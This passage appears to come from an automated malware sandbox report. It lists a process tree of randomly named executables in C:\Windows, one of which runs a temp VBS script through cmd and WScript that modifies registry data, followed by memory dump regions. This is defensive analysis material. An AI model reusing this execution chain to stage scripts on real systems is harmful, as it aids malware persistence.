                          • Suspicious use of AdjustPrivilegeToken
                          PID:596
                  • C:\Windows\IvTOEzgJ.exe
                    C:\Windows\IvTOEzgJ.exe
                    1⤵
                      PID:1856
                    • C:\Windows\CHVrgpSt.exe
                      C:\Windows\CHVrgpSt.exe
                      1⤵
                        PID:2016
                      • C:\Windows\udkEbwEl.exe
                        C:\Windows\udkEbwEl.exe
                        1⤵
                          PID:1844
                        • C:\Windows\HDnQjNKm.exe
                          C:\Windows\HDnQjNKm.exe
                          1⤵
                            PID:2248
                          • C:\Windows\RLhjOHLP.exe
                            C:\Windows\RLhjOHLP.exe
                            1⤵
                              PID:864
                            • C:\Windows\maynOwmE.exe
                              C:\Windows\maynOwmE.exe
                              1⤵
                                PID:2804
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c call "c:\windows\temp\tmp.vbs"
                                  2⤵
                                  • Modifies data under HKEY_USERS
                                  PID:3108
                                  • C:\Windows\SysWOW64\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
                                    3⤵
                                    • Modifies data under HKEY_USERS
                                    PID:3112
                              • C:\Windows\VAkHJhfp.exe
                                C:\Windows\VAkHJhfp.exe
                                1⤵
                                  PID:4036
                                • C:\Windows\gqEalohR.exe
                                  C:\Windows\gqEalohR.exe
                                  1⤵
                                    PID:436
                                  • C:\Windows\CPPIxHsB.exe
                                    C:\Windows\CPPIxHsB.exe
                                    1⤵
                                      PID:3388

                                    Network

                                    MITRE ATT&CK Enterprise v6

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • memory/384-6-0x00000000003B0000-0x00000000003BC000-memory.dmp

                                      Filesize

                                      48KB

                                    • memory/384-3-0x00000000011F0000-0x00000000011F1000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/384-5-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/384-2-0x0000000074390000-0x0000000074A7E000-memory.dmp

                                      Filesize

                                      6.9MB

                                    • memory/384-82-0x00000000051F0000-0x0000000005261000-memory.dmp

                                      Filesize

                                      452KB

                                    • memory/384-83-0x00000000005B0000-0x00000000005E1000-memory.dmp

                                      Filesize

                                      196KB

                                    • memory/1084-84-0x0000000000400000-0x0000000000430000-memory.dmp

                                      Filesize

                                      192KB

                                    • memory/1084-86-0x0000000074390000-0x0000000074A7E000-memory.dmp

                                      Filesize

                                      6.9MB

                                    • memory/1084-87-0x0000000000400000-0x0000000000430000-memory.dmp

                                      Filesize

                                      192KB

                                    • memory/1084-117-0x00000000010C0000-0x00000000010C1000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1528-8-0x0000000076241000-0x0000000076243000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1988-80-0x0000000001120000-0x0000000001121000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1988-91-0x00000000194E0000-0x00000000194E1000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1988-77-0x0000000019530000-0x0000000019532000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1988-76-0x00000000195B0000-0x00000000195B1000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1988-75-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1988-79-0x0000000000E30000-0x0000000000E31000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1988-74-0x000007FEF52C0000-0x000007FEF5CAC000-memory.dmp

                                      Filesize

                                      9.9MB

                                    • memory/1988-107-0x000000001A010000-0x000000001A011000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1988-146-0x000000001953A000-0x0000000019559000-memory.dmp

                                      Filesize

                                      124KB

                                    • memory/1988-73-0x000007FEFB9D1000-0x000007FEFB9D3000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1988-99-0x0000000019520000-0x0000000019521000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1988-96-0x0000000019380000-0x0000000019381000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1988-108-0x000000001AD30000-0x000000001AD31000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1988-115-0x000000001A040000-0x000000001A041000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1988-116-0x000000001ADC0000-0x000000001ADC1000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1988-97-0x0000000019390000-0x0000000019391000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1988-100-0x0000000019E80000-0x0000000019E81000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1988-98-0x0000000019E60000-0x0000000019E61000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1988-78-0x0000000019534000-0x0000000019536000-memory.dmp

                                      Filesize

                                      8KB